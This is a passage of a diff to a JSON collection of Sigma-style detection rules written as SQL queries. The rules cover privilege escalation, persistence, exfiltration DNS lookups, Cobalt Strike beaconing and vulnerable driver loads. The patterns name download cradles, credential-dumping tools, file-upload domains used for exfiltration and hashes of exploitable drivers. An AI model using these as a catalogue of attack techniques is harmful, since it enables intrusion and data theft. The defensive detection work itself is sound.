"Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE 